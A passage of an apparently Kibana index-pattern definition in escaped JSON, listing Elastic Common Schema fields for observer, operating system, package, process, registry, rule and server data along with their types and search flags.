\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.full\"}}},{\"count\":0,\"name\":\"observer.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.name\"}}},{\"count\":0,\"name\":\"observer.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.serial_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"organization.name\"}}},{\"count\":0,\"name\":\"os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.full\"}}},{\"count\":0,\"name\":\"os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.name\"}}},{\"count\":0,\"name\":\"os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.build_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.checksum\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.install_scope\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.installed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.command_line\"}}},{\"count\":0,\"name\":\"process.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.executable\"}}},{\"count\":0,\"name\":\"process.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.parent.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.command_line\"}}},{\"count\":0,\"name\":\"process.parent.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.executable\"}}},{\"count\":0,\"name\":\"process.parent.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.name\"}}},{\"count\":0,\"name\":\"process.parent.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.title\"}}},{\"count\":0,\"name\":\"process.parent.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.working_directory\"}}},{\"count\":0,\"name\":\"process.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.title\"}}},{\"count\":0,\"name\":\"process.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.working_directory\"}}},{\"count\":0,\"name\":\"registry.data.bytes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.strings\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.hive\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.key\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.user\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.ruleset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.uuid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.as.organization.name\"}}},{\"count\":0,\"name\":\"server.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.full_name\"}}},{\"count\":0,\"name\":\"server.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"nam